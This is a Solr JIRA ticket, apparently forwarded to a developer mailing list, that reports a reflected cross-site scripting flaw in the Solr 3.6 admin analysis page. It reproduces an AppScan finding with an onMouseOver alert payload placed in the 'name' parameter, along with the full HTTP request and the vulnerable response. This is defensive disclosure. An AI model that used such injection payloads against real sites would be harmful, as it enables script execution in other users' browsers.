You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@lucene.apache.org by "Rob Brooks (JIRA)" <ji...@apache.org> on 2013/01/14 19:40:13 UTC
[jira] [Created] (SOLR-4305) XSS vulnerability in Solr
/admin/analysis.jsp
Rob Brooks created SOLR-4305:
--------------------------------
Summary: XSS vulnerability in Solr /admin/analysis.jsp
Key: SOLR-4305
URL: https://issues.apache.org/jira/browse/SOLR-4305
Project: Solr
Issue Type: Bug
Components: multicore
Affects Versions: 3.6
Environment: Solaris
Reporter: Rob Brooks
This issue was found when running solr 3.6 in solaris, in a multicore setup. Each core had a cross site scripting vulnerability found at /admin/analysis.jsp while testing using IBM Rational AppScan 8.5.0.1.
Here are the details of the scan result as given by IBM Rational AppScan:
[1 of 1] Cross-Site Scripting
Severity: High
Test Type: Application
Vulnerable URL: https://<server>/solr/<core>/admin/analysis.jsp (Parameter: name)
CVE ID(s): N/A
CWE ID(s): 79 (parent of 83)
Remediation Tasks: Review possible solutions for hazardous character injection
Variant 1 of 6 [ID=19389]
The following changes were applied to the original request:
• Set parameter 'name's value to '" onMouseOver=alert(39846)//'
Request/Response:
12/10/2012 3:33:04 PM 16/187
POST /solr/<core>/admin/analysis.jsp HTTP/1.1
Cookie: JSESSIONID=0D77846A894B8BB086394C396F19D0E9
Content-Length: 96
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
Media Center PC 6.0; Tablet PC 2.0)
Host: <server>:8443
Content-Type: application/x-www-form-urlencoded
Referer: https://<server>/solr/<core>/admin/analysis.jsp?highlight=on
nt=type&name=" onMouseOver=alert
(39846)//&verbose=on&highlight=on&val=1234&qverbose=on&qval=1234
HTTP/1.1 200 OK
Content-Length: 1852
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 10 Dec 2012 15:54:38 GMT
<html>
<head>
<script>
var host_name="<server>"
</script>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="solr-admin.css">
<link rel="icon" href="favicon.ico" type="image/ico"></link>
<link rel="shortcut icon" href="favicon.ico" type="image/ico"></link>
<title>Solr admin page</title>
</head>
<body>
<a href="."><img border="0" align="right" height="78" width="142"
src="solr_small.png" alt="Solr"></a>
<h1>Solr Admin (Cares)
</h1>
<server><br/>
cwd=/export/home/kh SolrHome=/solr/<core>/
<br/>
12/10/2012 3:33:04 PM 17/187
HTTP caching is ON
<br clear="all">
<h2>Field Analysis</h2>
<form method="POST" action="analysis.jsp" accept-charset="UTF-8">
<table>
<tr>
<td>
<strong>Field
<select name="nt">
<option >name</option>
<option selected="selected">type</option>
</select></strong>
</td>
<td>
<input class="std" name="name" type="text" value="" onMouseOver=alert(39846)//">
</td>
</tr>
<tr>
<td>
<strong>Field value (Index)</strong>
<br/>
verbose output
<input name="verbose" type="checkbox"
checked="true" >
<br/>
highlight matches
<input name="highlight" type="checkbox"
checked="true" >
</td>
<td>
<textarea class="std" rows="8" cols="70" name="val">1234</textarea>
</td>
</tr>
<tr>
<td>
<strong>Field value (Query)</strong>
<br/>
verbose output
<input name="qverbose" type="checkbox"
checked="true" >
</td>
<td>
<textarea class="std" rows="1" cols="70" name="qval">1234</textarea>
</td>
</tr>
<tr>
<td>
</td>
<td>
<input class="stdbutton" type="submit" value="analyze">
</td>
</tr>
</table>
</form>
<strong>Unknown Field Type: " onMouseOver=alert(39846)//</strong>
</body>
</html>
12/10/2012 3:33:04 PM 18/187
Validation In Response:
• option>
<option selected="selected">type</option>
</select></strong>
</td>
<td>
<input class="std" name="name" type="text" value="" onMouseOver=alert
(39846)//">
</td>
</tr>
<tr>
<td>
<strong>Field value (Index)</strong>
<br/>
verbose output
<inp
Reasoning:
The test successfully embedded a script in the response, which will be executed once the user
activates the OnMouseOver function (i.e., hovers with the mouse cursor over the vulnerable
control). This means that the application is vulnerable to Cross-Site Scripting attacks.
CWE ID:
83 (child of 79)
Vulnerable URL: https://<server>/solr/<core>/admin/threaddump.jsp
Total of 1 security issues in this URL
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@lucene.apache.org
For additional commands, e-mail: dev-help@lucene.apache.org